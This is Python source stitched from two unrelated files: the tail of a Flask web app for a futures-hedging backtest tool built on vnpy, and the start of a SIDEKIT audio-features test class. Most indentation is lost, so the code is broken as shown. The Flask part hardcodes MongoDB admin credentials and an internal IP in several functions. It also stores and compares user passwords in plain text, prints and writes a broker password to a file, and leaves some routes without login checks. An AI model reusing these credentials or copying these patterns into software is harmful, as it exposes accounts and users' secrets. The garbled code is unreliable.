#paramFilename='examples/WebTrader/app/templates/'+title +'.html'
#path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
#path=os.path.join(path,paramFilename)
path=u'E:/vnpy-master/vnpy-master/examples/WebTrader/app/templates/'+title +'.html'
if os.path.exists(path):
os.remove(path)
line.render(path)
def drawBar(title,df):
from pyecharts import Bar
if title == "ContractVol":
pic = "合约手数"
if title == "Var":
pic = "Var"
bar=Bar(pic)
dates=df.index
print dates
#paramFilename='examples/WebTrader/app/templates/'+title +'.html'
#path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
#path=os.path.join(path,paramFilename)
path=u'E:/vnpy-master/vnpy-master/examples/WebTrader/app/templates/'+title +'.html'
if os.path.exists(path):
os.remove(path)
for name in df.columns:
bar.add(name,dates,df.loc[:,name])
bar.render(path)
@app.route('/search_history_result/<col>',methods=['GET','POST'])  # TODO: could the result be returned directly in the AJAX response, or via a second AJAX request - whichever is simpler
@login_required
def search_history_result(col):
    print ' col:',col  # col is the strategy name; it is used to push the chart data to the search_history_result page
    # which function builds the URL that is returned once the backtest finishes?
#post = Post.query.filter_by(id=col).first()
#query=post
#col=query
host, port = loadMongoSetting()
dbClient = pymongo.MongoClient(host, port)
dbClient.admin.authenticate("htquant", "htgwf@2018", mechanism='SCRAM-SHA-1')
db=dbClient.get_database('USERDATA_DB')
account=db.get_collection(col)
var=[]
col_vardf=col+'vardf'
account_vardf=db.get_collection(col_vardf)
for i in account_vardf.find():
i.pop('_id')
var.append(i)
vardf=pd.DataFrame(var)
vardf.index=vardf.iloc[:,0]
drawBar("Var",vardf)
num=[]
col_numdf=col+'numdf'
account_numdf=db.get_collection(col_numdf)
for i in account_numdf.find():
i.pop('_id')
num.append(i)
numdf=pd.DataFrame(num)
numdf.index=numdf.iloc[:,0]
drawBar("ContractVol",numdf)
nv=[]
col_nvdf=col+'nvdf'
account_nvdf=db.get_collection(col_nvdf)
for i in account_nvdf.find():
i.pop('_id')
nv.append(i)
nvdf=pd.DataFrame(nv)
nvdf.index=nvdf.iloc[:,0]
drawLine("NetValue",nvdf,col)
ptnv={'var':var}
margin=[]
col_margindf=col+'margindf'
account_margindf=db.get_collection(col_margindf)
for i in account_margindf.find():
i.pop('_id')
margin.append(i)
margindf=pd.DataFrame(margin)
margindf.index=margindf.iloc[:,0]
drawLine("Margin",margindf,col)
var=[]
opt = []
unhedged = []
unit = []
col_vardf=col+'vardf'
account_vardf=db.get_collection(col_vardf)
for i in account_vardf.find():
opt.append(i.values()[4])
unhedged.append (i.values()[1])
unit.append(i.values()[2])
#optnv=[]
#unhedgednv=[]
#unitnv=[]
#col_nvdf=col+'nvdf'
#account_nvdf=db.get_collection(col_nvdf)
#for i in account_nvdf.find():
#i.pop('_id')
#optnv.append([i[''].encode('ascii'),i[u"最优套保"]])
#unhedgednv.append([i[''].encode('ascii'),i[u"未对冲"]])
#unitnv.append([i[''].encode('ascii'),i[u"单位套保"]])
#optnum=[]
#unitnum=[]
#col_numdf=col+'numdf'
#account_numdf=db.get_collection(col_numdf)
#for i in account_numdf.find():
#i.pop('_id')
#optnum.append([i[''],i[u"最优套保"]])
#unitnum.append([i[''],i[u"单位套保"]])
#optmargin=[]
#unhedgedmargin=[]
#unitmargin=[]
#col_margindf=col+'margindf'
#account_margindf=db.get_collection(col_margindf)
#for i in account_margindf.find():
#print i
#i.pop('_id')
#optmargin.append([i[''],i[u"最优套保"]])
##unhedgedmargin.append([i[''],i["Unhedged"]])
#unitmargin.append([i[''],i[u"单位套保"]])
u=[]
col_hedgeResult = col + 'HedgeResult'
account_HedgeResultdf=db.get_collection(col_hedgeResult)
j = 0
for i in account_HedgeResultdf.find():
if j == 0 or j ==1 or j == 3:
f = round(i.values()[4],4)
f = str (f*100) +"%"
e = round(i.values()[1],4)
e = str (e*100) +"%"
g = round(i.values()[2],4)
g = str (g*100) +"%"
u.append([f,e,g])
if j>1 and j != 3:
u.append([i.values()[4],i.values()[1],i.values()[2]])
j= j+1
return render_template('search_history_result.html',u=u,opt=opt,unhedged= unhedged,unit= unit )
#return render_template('search_history_result.html',u=u,opt=opt,unhedged= unhedged,unit= unit ,optnv=optnv,unhedgednv=unhedgednv,unitnv=unitnv,optnum=optnum,unitnum=unitnum,
#optmargin=optmargin,unitmargin=unitmargin)
@app.route('/Var')
@login_required
def Var():
"""
    Line/bar chart page for the three data sets
    """
    # compute the data
return render_template('Var.html')
@app.route('/Margin')
@login_required
def Margin():
return render_template('Margin.html')
@app.route('/ContractVol')
@login_required
def ContractVol():
return render_template('ContractVol.html')
@app.route('/NetValue')
@login_required
def NetValue():
return render_template('NetValue.html')
@app.route('/<index>/detail',methods=['GET','POST'])
@login_required
def detail(index):
post = Post.query.filter_by(id=index).first()
query=post.title
if request.method == 'POST':
if request.form['Post']=='Post':
            return redirect(url_for('search_history_result',col=query))  # everything is URL-based: previously we went to the detail page first and redirected from there; there is no redirect-on-backtest-completion logic
elif request.method == 'GET':
return render_template('detail.html',title='Detail',post = post)
#@app.route('/write',methods=['GET','POST'])
#@login_required
#def write():
#form = PostForm()
#if form.validate_on_submit():
#post = Post(title=form.title.data,content = form.content.data,user_id = current_user.id)
#db.session.add(post)
#db.session.commit()
#flash('Your post is now live!')
#return redirect(url_for('index'))
#return render_template('write.html',title='Write',form=form)
@app.route('/upload', methods=['POST', 'GET'])
def upload():
if request.method == 'POST':
f = request.files['file']
        basepath = os.path.dirname(__file__)  # directory of the current file
filename = str(current_user.id)+ 'gateway_setting.json'
        upload_path = os.path.join(basepath, '',filename)  # note: the target folder must already exist, otherwise the path is reported as missing
f.save(upload_path)
return redirect(url_for('upload'))
return render_template('upload.html')
@app.route('/accountManage')
def accountManage():
return render_template('accountManage.html')
@app.route('/mydict', methods=['GET', 'POST'])
def mydict():
print('login all account')
from utility import convert_file_to_dict
current_path = os.path.abspath(os.path.dirname(__file__))
# gateway
gateway_setting_name = str(current_user.id) + 'gateway_setting.json'
gateway_setting_location = os.path.join(current_path, gateway_setting_name)
gateway_setting_dict = convert_file_to_dict(gateway_setting_location)
accountstr = ''
for id,value in gateway_setting_dict.items():
accountID = value['accountID']
password = value['password']
brokerID = value['brokerID']
tdAddress = value['tdAddress']
mdAddress = value['mdAddress']
a = "'" + str(accountID) + ', '+"'"
accountstr = a +accountstr
info = getlogin(wsdl_url,accountID=accountID,password=password,brokerID=brokerID,tdAddress=tdAddress,mdAddress=mdAddress)
if request.method == 'POST':
a = request.form['mydata']
print(a)
a = "'" + str(accountID) + "'"
d = {'name': ' login successful', 'age': accountstr}
return jsonify(d)
# query all accounts
@app.route ('/mytable',methods = ['GET', 'POST'])
def mytable():
table = []
table.append(
('账号', '动态权益', '可用资金', '可用资金', '手续费', '平仓盈亏', '持仓盈亏', '静态权益'))
from utility import convert_file_to_dict
current_path = os.path.abspath(os.path.dirname(__file__))
# gateway
gateway_setting_name = str(current_user.id) + 'gateway_setting.json'
gateway_setting_location = os.path.join(current_path, gateway_setting_name)
gateway_setting_dict = convert_file_to_dict(gateway_setting_location)
for id, value in gateway_setting_dict.items():
info = getAccountInfo(wsdl_url, accountID=id)
table.append(info)
accountInfo = table[1:]
total = []
accountInfonew = []
for i in accountInfo :
accoutSt = i[1:]
accountInfonew.append(accoutSt)
for i in accountInfonew :
for j in i:
j = float(j)
for i in accountInfonew :
m =0
temp = []
for j in i:
temp.append(float(j))
if len(total)>6 :
total[m] =total[m] +temp[m]
else :
total.append(float(j))
m= m+1
total.insert(0,'账户信息汇总')
table.append(total)
data = json.dumps(table)
print(data)
return data
@app.route('/mytable2', methods=['GET', 'POST'])  # fetch positions
def mytable2():
table = []
n = 9
table.append(
('账号','合约代码', '交易所代码', '多单持仓量', '多单上日持仓', '多单今日持仓', '空单持仓量', '空单上日持仓', '空单今日持仓'))
from utility import convert_file_to_dict
current_path = os.path.abspath(os.path.dirname(__file__))
# gateway
gateway_setting_name = str(current_user.id) + 'gateway_setting.json'
gateway_setting_location = os.path.join(current_path, gateway_setting_name)
gateway_setting_dict = convert_file_to_dict(gateway_setting_location)
for id, value in gateway_setting_dict.items():
info = getPositionInfo(wsdl_url, accountID=id)
#info_cell = [info[i:i+n] for i in range(0, len(info), n)]
if len(info)>9:
for i in range(0, len(info), n ):
info_cell = info[i:i+n]
table.append(info_cell)
else:
table.append(info)
positionInfo = table[1:]
total = []
positionInfonew = []
for i in positionInfo :
if len(i)>2 :
accoutSt = i[1:]
positionInfonew.append(accoutSt)
# for i in positionInfonew :
# for j in i[2:]:
# j = float(j)
df = DataFrame(positionInfonew)
    traindata = np.array(df[[2, 3, 4, 5, 6, 7]], dtype=float)
traindata = DataFrame(traindata)
traindata['symbol']=df[0]
traindata['exchange'] = df[1]
newdf = traindata.groupby(['symbol','exchange']).sum()
for index, row in newdf.iterrows():
totalpositon = row.tolist()
totalpositon.insert(0,index[1])
totalpositon.insert(0, index[0])
totalpositon.insert(0,u'按照标的汇总')
table.append(totalpositon)
data = json.dumps(table)
positionDf = DataFrame(table)
print(data)
return data
@app.route('/login',methods=['GET','POST'])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.login_check(request.form.get('username'),request.form.get('password'))
if user:
login_user(user)
user.last_seen = datetime.now()
try:
db.session.add(user)
db.session.commit()
except:
flash("The Database error!")
return redirect('/login')
flash('Your name: ' + request.form.get('username'))
flash('remember me? ' + str(request.form.get('remember_me')))
return redirect(url_for("index"))
else:
flash('Login failed, username or password error!')
return redirect('/login')
return render_template('login.html',form=form)
@app.route('/sign-up',methods=['GET','POST'])
def sign_up():
form = SignUpForm()
user = User()
if form.validate_on_submit():
user_name = request.form.get('username')
user_password = request.form.get('password')
register_check = User.query.filter(db.and_(User.username == user_name, User.password == user_password)).first()
if register_check:
return redirect('/sign-up')
if len(user_name) and len(user_password):
user.username = user_name
user.password = user_password
try:
db.session.add(user)
db.session.commit()
except:
return redirect('/sign-up')
return redirect('/index')
return render_template("sign_up.html",form=form)
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('index'))
@app.route('/edit', methods = ['GET', 'POST'])
@login_required
def edit():
form = EditForm(g.user.username)
if form.validate_on_submit():
g.user.username = form.username.data
g.user.brokerID = form.brokerID.data
g.user.mdAddress = form.mdAddress.data
g.user.tdAddress = form.tdAddress.data
g.user.userID = form.userID.data
g.user.password = form.password.data
db.session.add(g.user)
db.session.commit()
param = {}
param['brokerID'] = form.brokerID.data
param['mdAddress'] = g.user.mdAddress
param['tdAddress'] = g.user.tdAddress
param['userID'] = g.user.userID
param['password'] = g.user.password
print param
writeCTP_connect_json(param)
        flash(u'Your changes have been saved')
return redirect(url_for('edit'))
form.username.data = g.user.username
#form.about_me.data = g.user.about_me
return render_template('edit.html',form = form)
@app.route('/delete/<post_id>',methods = ['POST'])
@login_required
def delete(post_id):
post = Post.query.filter_by(id = post_id).first()
db.session.delete(post)
db.session.commit()
flash("delete post successful!")
#return redirect(url_for('user',username=g.user.username))
posts=Post.query.filter_by(user_id= current_user.id).order_by(db.desc(Post.time))
return render_template('index.html',title='Home',user = current_user,posts = posts)
@app.route('/edit/<post_id>',methods = ['GET'])
@login_required
def editpost(post_id):
form = ChangeForm()
post = Post.query.filter_by(id = post_id).first()
form.title.data = post.title
form.content.data = post.content
return render_template('change.html',form = form,post_id=post.id)
@app.route('/change/<post_id>',methods = ['POST'])
@login_required
def change(post_id):
form = ChangeForm()
post = Post.query.filter_by(id = post_id).first()
if form.validate_on_submit():
post.title = form.title.data
print(post.title,post.content)
post.content = form.content.data
db.session.add(post)
db.session.commit()
flash('Your changes have been saved.')
return redirect(url_for('user',username=g.user.username))
#-----------------------------------------------------------------------------------------
#-----------------------------------------------------------------------------------------
@app.route('/paramInput',methods=['GET','POST'])
@login_required
def paramInput():
form = PostForm()
if form.validate_on_submit():
print "title1: ",form.title.data , request.form.get('starttime'),request.form.get('code'),request.form.get('direction') #request.form.get('direction')
code = request.form.get('code')
section2 = request.form.get('section2')
if code=="I":
spotID = section2[1:9]
else :
spotID = section2[0:8]
print u"现货",spotID
spotID = spotID.strip()
direction = request.form.get('direction')
if direction == u'持有多头':
direction = u'LongHedging'
else:
direction = u'ShortHedging'
volume = form.title.data
startdate = request.form.get('starttime')
enddate = request.form.get('endtime')
strategystartDate = request.form.get('strategystartDate')
period = form.content.data
strategyName = request.form.get('strategyName')
strategyChoice = request.form.get('strategyChoice')
code = code.encode('unicode-escape').decode('string_escape')
code = code.split('.')[0]
total= strategyName
#contents="\n策略命名:"+strategyName+"\n策略选择:"+strategyChoice +"\n合约代码:"+code+"\n现货数量:"+volume+"\nspotID:"+spotID+"\n调仓周期:"+period+"\n对冲方向:" \
#+direction+"\n数据加载日期:"+startdate+"\n策略开始日期:"+strategystartDate+"\n结束日期:"+enddate
contents=strategyName+"\n"+strategyChoice +"\n"+code+"\n"+volume+"\n"+spotID+"\n"+period+"\n" \
+direction+"\n"+startdate+"\n"+strategystartDate+"\n"+enddate
print 'name:',total , contents
post=Post(title=total,content = contents,user_id = current_user.id)
db.session.add(post)
db.session.commit()
print "finishing save data!!!!"
        flash(u'Your changes have been saved')
return render_template('paramInput.html',title='paramInput',form=form)
#-------------------------------------------------------------------------------------------
# Celery configuration
@celery.task(bind=True)
def long_task(self,data):
"""Background task that runs a long function with progress reports."""
    # start a thread to listen for the backtest dates
#queue = Queue()
    print u'task argument:', data
data = str(data)
posts = db.session.query(Post).filter(Post.title ==data).first()
    print u'matched post content:', posts.content
para= posts.content
    # rewrite the local JSON: the strategy currently reads its parameters from JSON, so save them here; later the parameters should be passed into the strategy directly
param = {}
code = para.splitlines()[2].decode('utf-8')
param['strategyname'] = data
param['symbol'] = para.splitlines()[2].decode('utf-8')
param['spotID'] = para.splitlines()[4].decode('utf-8')
param['Qs'] = para.splitlines()[3].decode('utf-8')
param['period'] = para.splitlines()[5].decode('utf-8')
param['direction'] = para.splitlines()[6].decode('utf-8')
    param['datastartdate'] = para.splitlines()[7].decode('utf-8')  # data start date
    param['startdate'] = para.splitlines()[8].decode('utf-8')  # strategy start date
param['enddate'] = para.splitlines()[9].decode('utf-8')
param['strategyName'] = para.splitlines()[0].decode('utf-8')
param['strategyChoice'] = para.splitlines()[1].decode('utf-8')
writeJson(param)
import datetime
#date_ = paramDate()
startdate= para.splitlines()[7]
lastdate=para.splitlines()[9]
startDate = time.strptime(startdate, "%Y-%m-%d")
endDate = time.strptime(lastdate, "%Y-%m-%d")
date1=datetime.datetime(startDate[0],startDate[1],startDate[2])
date2=datetime.datetime(endDate[0],endDate[1],endDate[2])
total = (date2 - date1).days
##s1 = Student(startdate= date_['startdate'],lastdate=date_['enddate'], queue=queue)
#s1 = Student(startdate='20170101' ,lastdate='20171230', queue=queue)
#s1.start()
    # start the backtest instance thread
c = Thread(target=producer)
c.start()
    # listen for progress messages
message = 'hold on'
while True:
msg = queue.get()
if msg == "finish":
return {'current': 100, 'total': 100, 'status': 'Task completed!',
'result': 42}
else :
dt = time.strptime(msg, "%Y-%m-%d")
date3 = datetime.datetime(dt[0],dt[1],dt[2])
i = (date3 - date1).days
self.update_state(state='PROGRESS',
meta={'current': i, 'total': total,
'status': message})
print i ,total
time.sleep(1)
#if i == 99:
#print(u"{}:finish!".format(lastdate))
#return {'current': 100, 'total': 100, 'status': 'Task completed!',
#'result': 42}
#if dt == time.strptime(lastdate,"%Y-%m-%d"):
#print(u"{}:finish!".format(lastdate))
#return {'current': 100, 'total': 100, 'status': 'Task completed!',
#'result': 42}
# producer: the backtest thread
def producer():
    # backtest instance thread: pushes the backtest datetime progress onto the queue
engine = BacktestingEngine(queue=queue)
    # .......... run the backtest ..........
    # read the strategy parameter dict to prepare for loading the contracts
    engine.readParam_Setting()
    # set the backtest dates
date_ = paramDate()
datastartdate= date_['datastartdate']
lastdate=date_['enddate']
engine.setStartDate(datastartdate, 0)
engine.setEndDate(lastdate)
#engine.setStartDate('20170103', 0)
#engine.setEndDate('20170213')
    # set the commission rate
    engine.setRate(0.3 / 10000)  # 0.3 per 10,000 (i.e. 0.003%)
    # create the strategy object in the engine
#engine.initStrategy(strategyDemo, {})
engine.initStrategy(strategyHedge, {})
    # read the parameters
symbol = date_['symbol']
symbolList = []
symbol = symbol.encode('unicode-escape').decode('string_escape')
symbolList.append(symbol.split('.')[0])
#symbolList = ['HC']
title = date_['strategyname']
engine.setDatabase(symbolList)
    # set the initial position
engine.setInitialPos(0)
engine.loadDailyHistoryData()
engine.hedgeResult()
host,port=loadMongoSetting()
dbClient = pymongo.MongoClient(host, port)
dbClient.admin.authenticate("htquant", "htgwf@2018", mechanism='SCRAM-SHA-1')
db=dbClient.get_database('USERDATA_DB')
    # drop any existing collections with the same name first
account=db.get_collection(title)
account.drop()
account=db.get_collection(title+'vardf')
account.drop()
account=db.get_collection(title+'nvdf')
account.drop()
account=db.get_collection(title+'margindf')
account.drop()
account=db.get_collection(title+'numdf')
account.drop()
account=db.get_collection(title+'HedgeResult')
account.drop()
    # backtest results
col=db[title]
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\resultsDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col.insert(returnData[i])
    # nvdf sheet
col_nvdf=db[title+'nvdf']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\nvDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_nvdf.insert(returnData[i])
    # vardf sheet
col_vardf=db[title+'vardf']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\varDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_vardf.insert(returnData[i])
    # numdf sheet
col_numdf=db[title+'numdf']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\numDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_numdf.insert(returnData[i])
    # margindf sheet
col_margindf=db[title+'margindf']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\marginDF.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_margindf.insert(returnData[i])
#HedgeResult
col_margindf=db[title+'HedgeResult']
data=xlrd.open_workbook(r'E:\vnpy-master\vnpy-master\vnpy\trader\app\ctaStrategy\HedgeResult.xlsx')
table=data.sheets()[0]
rowstag=table.row_values(0)
nrows=table.nrows
returnData={}
for i in range(1,nrows):
returnData[i]=json.dumps(dict(zip(rowstag,table.row_values(i))))
returnData[i]=json.loads(returnData[i])
col_margindf.insert(returnData[i])
    # everything has been generated; push the completion message onto the queue
msg = 'finish'
queue.put(msg)
@app.route('/longtask', methods=['GET','POST'])
def longtask():
#global sid
    sid = request.get_data()  # raw POST body; how should this be debugged?
    print u'page payload:', sid
task = long_task.apply_async([sid])
return jsonify({}), 202, {'Location': url_for('taskstatus',
task_id=task.id)}
@app.route('/status/<task_id>')
def taskstatus(task_id):
task = long_task.AsyncResult(task_id)
if task.state == 'PENDING':
response = {
'state': task.state,
'current': 0,
'total': 1,
'status': 'Pending...'
}
elif task.state != 'FAILURE':
response = {
'state': task.state,
'current': task.info.get('current', 0),
'total': task.info.get('total', 1),
'status': task.info.get('status', '')
}
if 'result' in task.info:
response['result'] = task.info['result']
else:
# something went wrong in the background job
response = {
'state': task.state,
'current': 1,
'total': 1,
'status': str(task.info), # this is the exception raised
}
return jsonify(response)
def loadMongoSetting():
"""载入MongoDB数据库的配置"""
fileName = 'VT_setting.json'
path = os.path.abspath(os.path.dirname(__file__))
fileName = os.path.join(path, fileName)
try:
        f = open(fileName)
setting = json.load(f)
host = setting['mongoHost']
port = setting['mongoPort']
except:
host = '10.3.135.33'
port = 57012
return host, port
#-----------------------------
def loadDailyHistoryData(collection,query,region):
"""mongodb数据库数据"""
host, port = loadMongoSetting()
dbClient = pymongo.MongoClient(host, port)
dbClient.admin.authenticate("htquant", "htgwf@2018", mechanism='SCRAM-SHA-1')
code = collection.split('.')[0]
ID = region.split(" ")[0]
db=dbClient.get_database('SPOT_DB')
account=db.get_collection(code)
print "ID: ",ID ,"query:",query
u=[]
if code=='I':
for i in account.find({"Variety":query}):
u.append([i["ID"],i["Variety"],i["Grade"],i["Region"],i["Price"],i["Date"]])
else :
for i in account.find({"ID":ID}):
u.append([i["ID"],i["Variety"],i["Grade"],i["Region"],i["Price"],i["Date"]])
return u
@app.route('/searchResult/<collection>/<query>/<region>',methods=['GET','POST'])  # '?' is not valid inside a route rule, so the three values are passed as path segments
@login_required
def searchResult(collection,query,region):
u=loadDailyHistoryData(collection,query,region)
return render_template('searchResult.html',u=u)
@app.route('/search',methods=['GET','POST'])
@login_required
def search():
form = SearchForm()
if request.method == 'POST':
print request.form.get('collection'),request.form.get('code'),request.form.get('region')
return redirect(url_for('searchResult',collection=request.form.get('collection'),query=request.form.get('code'),\
region=request.form.get('region')))
return render_template('search.html', title='Search', form=form)
#---------------------------------------------------------
#@app.route('/trader')
@login_required
def trader():
form = PostForm()
if form.validate_on_submit():
post = Post(title=form.title.data,content = form.content.data,user_id = current_user.id)
db.session.add(post)
db.session.commit()
flash('Your post is now live!')
return redirect(url_for('index'))
return send_file('./templates/trader.html')
#---------------------------------------------------
def paramDate():
paramFilename='vnpy/trader/app/ctaStrategy/strategy/strategyHedge_Param_Setting.json'
path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
path=os.path.join(path,paramFilename)
    # load the strategy variables
with open(path) as f:
param = json.load(f)
return param
def writeJson(param):
paramFilename='vnpy/trader/app/ctaStrategy/strategy/strategyHedge_Param_Setting.json'
path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
path=os.path.join(path,paramFilename)
with open(path, 'w') as f :
json.dump(param,f)
def writeCTP_connect_json(param):
path="E:/vnpy-master/vnpy-master/examples/WebTrader/CTP_connect.json"
with open(path, 'w') as f :
json.dump(param,f)
@app.route('/HedgeForm',methods=['GET','POST'])
@login_required
def HedgeForm():
import flask_excel
import pandas as pd
paramFilename='vnpy/trader/app/ctaStrategy/HedgeResult.csv'
path=os.path.abspath(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))))
path=os.path.join(path,paramFilename)
import numpy as np
HedgeResult = pd.read_csv(path)
u = np.array(HedgeResult)
#for index , detail in u.items():
#u.append([detail[0],detail[1],detail[2],detail[3]])#,detail[4],detail[5],detail[6],detail[7]])
return render_template('HedgeFromResult.html',u=u)
#-------------------------------------------
"""监听线程"""
class Student(Thread):
def __init__(self, startdate, lastdate, queue):
import datetime
super(Student,self).__init__()
self.lastdate = lastdate
self.queue = queue
startDate = time.strptime(startdate, "%Y%m%d")
endDate = time.strptime(lastdate, "%Y%m%d")
date1=datetime.datetime(startDate[0],startDate[1],startDate[2])
date2=datetime.datetime(endDate[0],endDate[1],endDate[2])
total = (date2 - date1).days
def run(self):
while True:
# 监听回测程序
msg = self.queue.get()
#i = endDate - datetime.strptime(msg, "%Y-%m-%d")
dt = time.strptime(msg, "%Y-%m-%d")
date3 = datetime.datetime(dt[0],dt[1],dt[2])
i = (date2 - date3).days
self.update_state(state='PROGRESS',
meta={'current': i, 'total': total,
'status': message})
print "days : " ,i
#time.sleep(1)
# 到日期返回结束信息
if msg == self.lastdate:
print(u"{}:finish!".format(self.lastdate))
return {'current': 100, 'total': 100, 'status': 'Task completed!',
'result': 42}
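# Hedged sketch (not part of the original app): how a client might drive the Celery task above -
# POST the strategy name to /longtask, then poll the returned Location URL until the task reports
# a result. The base URL, the strategy name and the use of the requests library are assumptions
# made for illustration only.
def poll_backtest_progress(base_url="http://localhost:5000", strategy_name="demo_strategy"):
    import requests
    resp = requests.post(base_url + "/longtask", data=strategy_name)
    status_url = base_url + resp.headers["Location"]
    while True:
        state = requests.get(status_url).json()
        print("{} / {} {}".format(state.get("current"), state.get("total"), state.get("status")))
        # taskstatus() includes 'result' once long_task returns, and reports FAILURE on errors
        if "result" in state or state.get("state") == "FAILURE":
            return state
        time.sleep(2)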
|
features_server.py
|
# -*- coding: utf-8 -*-
#
# This file is part of SIDEKIT.
#
# SIDEKIT is a python package for speaker verification.
# Home page: http://www-lium.univ-lemans.fr/sidekit/
#
# SIDEKIT is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the License,
# or (at your option) any later version.
#
# SIDEKIT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with SIDEKIT. If not, see <http://www.gnu.org/licenses/>.
"""
Copyright 2014-2016 Sylvain Meignier and Anthony Larcher
:mod:`features_server` provides methods to manage features
"""
import os
import multiprocessing
import logging
from sidekit import PARALLEL_MODULE
from sidekit.frontend.features import *
from sidekit.frontend.vad import *
from sidekit.frontend.io import *
from sidekit.frontend.normfeat import *
from sidekit.sidekit_wrappers import *
import sys
import threading
import h5py
import numpy as np
import ctypes
from sidekit.features_server import FeaturesServer
if sys.version_info.major == 3:
import queue as Queue
else:
import Queue
# import memory_profiler
__license__ = "LGPL"
__author__ = "Anthony Larcher"
__copyright__ = "Copyright 2014-2016 Anthony Larcher"
__maintainer__ = "Anthony Larcher"
__email__ = "anthony.larcher@univ-lemans.fr"
__status__ = "Production"
__docformat__ = 'reStructuredText'
class FeaturesServer_test(FeaturesServer):
"""
A class for acoustic feature management.
FeaturesServer should be used to extract acoustic features (MFCC or LFCC)
from audio files in SPHERE, WAV or RAW PCM format.
It can also be used to read and write acoustic features from and to disk
in SPRO4 or HTK format.
:attr input_dir: directory where to load audio or feature files
:attr input_file_extension: extension of the incoming files
    :attr label_dir: directory where to read and write label files
:attr label_files_extension: extension of label files to read and write
:attr from_file: format of the input files to read, can be `audio`, `spro4`
or `htk`, for audio files, format is given by the extension
:attr config: pre-defined configuration for speaker diarization or recognition
in 8 or 16kHz. Default is speaker recognition 8kHz
:attr single_channel_extension: list with a single extension to add to
the audio filename when processing a single channel file.
        Default is empty, meaning the feature file has the same name as
the audio file
:attr double_channel_extension: list of two channel extension to add
to the audio filename when processing two channel files.
Default is ['_a', '_b']
:attr sampling_frequency: sample frequency in Hz, default is None,
determine when reading the audio file
:attr lower_frequency: lower frequency limit of the filter bank
:attr higher_frequency: higher frequency limit of the filter bank
:attr linear_filters: number of linear filters to use for LFCC extraction
:attr log_filters: number of linear filters to use for MFCC extraction
:attr window_size: size of the sliding window in seconds
:attr shift: time shift between two feature vectors
:attr ceps_number: number of cepstral coefficients to extract
:attr snr: snr level to consider for SNR-based voice activity detection
:attr vad: type of voice activity detection to use, can be 'snr', 'energy'
(using a three Gaussian detector) or 'label' when reading the info from
pre-computed label files
:attr feat_norm: normalization of the acoustic features, can be
'cms' for cepstral mean subtraction, 'mvn' for mean variance
normalization or 'stg' for short term Gaussianization
:attr log_e: boolean, keep log energy
:attr delta: boolean, add the first derivative of the cepstral coefficients
:attr double_delta: boolean, add the second derivative of the cepstral
coefficients
:attr rasta: boolean, perform RASTA filtering
:attr keep_all_features: boolean, if False, only features labeled as
"speech" by the vad are saved if True, all features are saved and
a label file is produced
"""
def __init__(
self,
input_dir=None,
feature_id=None,
config=None,
sampling_frequency=None,
lower_frequency=None,
higher_frequency=None,
linear_filters=None,
log_filters=None,
window_size=None,
shift=None,
ceps_number=None,
snr=None,
vad=None,
feat_norm=None,
log_e=None,
dct_pca=False,
dct_pca_config=None,
sdc=False,
sdc_config=None,
delta=None,
double_delta=None,
delta_filter=None,
rasta=None,
keep_all_features=None,
spec=False,
mspec=False,
mask=None
):
""" Process of extracting the feature frames (LFCC or MFCC) from an audio signal.
Speech Activity Detection, MFCC (or LFCC) extraction and normalization.
Can include RASTA filtering, Short Term Gaussianization, MVN and delta
computation.
:param input_dir: directory where to find the audio files.
Default is ./
:param input_file_extension: extension of the audio files to read.
Default is 'sph'.
        :param label_dir: directory where to store label files if required.
Default is ./
:param label_file_extension: extension of the label files to create.
Default is '.lbl'.
        :param config: predefined configuration, one of 'diar_16k', 'sid_16k', 'diar_8k' or 'sid_8k'
"""
self.input_dir = './'
self.from_file = 'audio'
self.feature_id = 'ceps'
self.sampling_frequency = 8000
self.lower_frequency = 0
self.higher_frequency = self.sampling_frequency / 2.
self.linear_filters = 0
self.log_filters = 40
self.window_size = 0.025
self.shift = 0.01
self.ceps_number = 13
self.snr = 40
self.vad = None
self.feat_norm = None
self.log_e = False
self.dct_pca = False
self.dct_pca_config = (12, 12, None)
self.sdc = False
self.sdc_config = (1, 3, 7)
self.delta = False
self.double_delta = False
self.delta_filter = np.array([.25, .5, .25, 0, -.25, -.5, -.25])
self.mask = None
self.rasta = False
